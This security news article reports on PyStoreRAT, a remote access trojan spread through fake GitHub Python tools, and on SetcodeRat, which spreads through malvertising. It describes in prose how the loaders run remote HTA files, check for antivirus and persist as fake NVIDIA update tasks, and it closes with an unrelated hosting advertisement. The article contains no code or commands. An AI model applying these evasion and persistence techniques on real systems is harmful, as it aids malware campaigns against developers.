Cybersecurity researchers have flagged a new campaign exploiting GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) known as PyStoreRAT.
According to Morphisec researcher Yonatan Edri, these repositories are often portrayed as development utilities or OSINT tools, containing only a few lines of code that download a remote HTA file and execute it using ‘mshta.exe’. PyStoreRAT is termed a "modular, multi-stage" implant that can execute a variety of payloads, including EXE, DLL, PowerShell, and others. It also delivers an information stealer dubbed Rhadamanthys as a secondary payload.
The attack chains disseminate the malware via Python or JavaScript loader stubs embedded in GitHub repositories that masquerade as OSINT tools, DeFi bots, GPT wrappers, or security utilities appealing to analysts and developers. The earliest indications of the campaign date back to mid-June 2025, with a consistent release of malicious repositories since.
Threat actors typically create new GitHub accounts or use dormant ones to publish these repositories. They slip the malicious payload in through "maintenance" commits after the tools gain traction and appear on GitHub’s trending lists. Many tools in these repositories function incorrectly, often just displaying static menus, while their limited operations are designed to give them a façade of legitimacy.
This operation triggers the execution of remoted HTA payloads, which deploys the PyStoreRAT malware, allowing it to gather system information, check for administrative privileges, and search for cryptocurrency wallet files linked to services like Ledger Live and Trezor.
The loader stub also identifies installed antivirus software, particularly looking for names associated with notable cybersecurity companies, to evade detection. In cases of detection, it launches "mshta.exe" via "cmd.exe." If undetected, it executes directly.
Persistence is established by creating scheduled tasks that masquerade as NVIDIA app updates. Ultimately, the malware contacts an external server to execute various commands, such as downloading other malicious payloads, running PowerShell commands directly in memory, and deleting scheduled tasks to cover its tracks.
While the identities of the threat actors remain unknown, the presence of Russian-language artifacts suggests a possibly Eastern European origin. Edri noted that PyStoreRAT’s design signifies a transition to modular, adaptable implants that can effectively circumvent security measures.
In a related development, QiAnXin, a Chinese security vendor, announced another new RAT called SetcodeRat, which has likely been disseminating across China since October 2025. It exploits malvertising techniques to infect hundreds of computers, including those of governmental and enterprise users.
SetcodeRat disguises itself as genuine installers for widely-used software. It proceeds with its operations only if the victim’s system is set to certain Chinese languages, verifying its geographical relevance before launching an executable that facilitates the RAT’s payload execution. It can perform various malicious activities, including taking screenshots, logging keystrokes, and collecting network information.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.